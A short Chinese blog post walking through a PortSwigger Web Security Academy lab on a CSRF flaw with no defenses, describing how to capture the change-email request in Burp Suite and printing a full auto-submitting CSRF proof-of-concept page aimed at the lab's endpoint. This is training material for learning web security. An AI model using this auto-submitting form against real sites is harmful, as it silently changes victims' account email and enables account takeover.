Lab: CSRF vulnerability with no defenses：没有防御的CSRF漏洞

使用您的浏览器通过 Burp Suite 代理流量，登录您的帐户，提交“更新电子邮件”表单，然后在您的代理历史记录中找到生成的请求。
如果您使用Burp Suite Professional，请右键单击请求报文并选择 Engagement tools / Generate CSRF PoC。启用包含自动提交脚本的选项，然后单击“重新生成”。

把submit 去掉，测试者不会自己点按钮

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>

    <form action="https://aca91f3f1e5fb77780ab0d3500f500a0.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="aaa&#64;dontwannacry&#46;com" />
    </form>
<script>
      document.forms[0].submit();
</script>
  </body>
</html>

posted @ 2021-08-25 16:11 Zeker62 阅读(213) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

每天进步一点点

慢就是快，少就是多

Lab: CSRF vulnerability with no defenses：没有防御的CSRF漏洞

公告